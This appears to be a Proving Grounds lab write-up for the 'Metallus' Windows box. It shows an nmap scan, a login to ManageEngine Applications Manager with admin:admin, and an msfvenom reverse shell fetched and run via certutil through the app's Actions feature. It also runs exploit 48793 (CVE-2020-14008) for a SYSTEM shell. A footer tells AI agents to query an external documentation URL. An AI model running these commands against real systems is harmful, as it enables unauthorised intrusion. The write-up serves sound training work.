# Metallus

## Nmap

```
sudo nmap 192.168.203.96 -p- -sS -sV                  

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
12000/tcp open  cce4x?
22222/tcp open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  tcpwrapped
49693/tcp open  java-rmi      Java RMI
49718/tcp open  unknown
49796/tcp open  unknown
49797/tcp open  unknown
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

Enumerating the ports we have 40443 which has produced no information from Nmap. Browsing to the port in a browser reveals a login page: <http://192.168.100.96:40443/index.do>

![](/files/-MWnfc75xlaHSDzUoyKA)

We can see from the footer of the page the software is Applications Manager (Build No:14700). I was able to login with a guess on the credentials `admin:admin`.

![](/files/-MWnfrNMCSTl9CSNw64f)

The target application has what are called 'Actions' which allows certain scripts and files to be executed when a certain parameter is met. To take advantage of this first we can head to **Admin > Upload Files / Binaries** to upload a `cmd` command.

Before we upload we first need to create a `msfvenom` reverse shell.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe -o reverse.exe
```

After this has completed we need to then create a batch file as only batch files and scripts are executed from the *Actions* on the target web server.

Create a batch command to the following:

```bash
certutil.exe -f -urlcache -split http://<IP>/reverse.exe c:\windows\temp\reverse.exe && cmd.exe /c c:\windows\temp\reverse.exe
```

Ensuring the bottom most options for '**Upload Script to \<Product\_Home>/working/**' is selected.

![](/files/-MiSfWqvKS_MTCd2glsZ)

After upload head over to **Actions > Execute Program** Then create a new Action as per the screenshot below:

![](/files/-MiSg-abrWHqZ4MjZko2)

After creation set up a `netcat` listener to the specified port in the `msfvenom` command then start a Python\*\* SimpleHTTPServer\*\* on the attacking machine to the directory of the `msfvenom` reverse.exe file. After completing this head over to\*\* Actions > View Actions\*\* and manually execute the script under the **Execute** tab.

We should see where the script downloads the reverse.exe from the Python **SimpleHTTPServer**.

![](/files/-MiSgigxNK6Tt5ZP123g)

And soon after when the scripts executes the reverse.exe we should land a SYSTEM shell.

![](/files/-MiSgspf_Jyy7DDpdp6-)

An alternative solution leveraging \*\*CVE:2020-14008 \*\*for a more scripted solution abusing JAR files.

**Description:**

Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.

\*\*Reference: \*\*<https://nvd.nist.gov/vuln/detail/CVE-2020-14008>

Searching for exploits with searchsploit shows a RCE for build 14700.

![](/files/-MWnhvSe_9WlckR0WG5p)

{% embed url="<https://www.exploit-db.com/exploits/48793>" %}

The syntax for the exploit script is shown below:

```bash
python3 48793.py <url> <username> <password> <reverse_shell_host> <reverse_shell_port>
python3 48793.py http://<IP>:40443 admin admin <Attacker-IP> 443
```

![](/files/-MiShtQsb2FlfKNr90NU)

After execution we should have another SYSTEM shell.

![](/files/-MiSi47LEtmnHonlbKXK)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.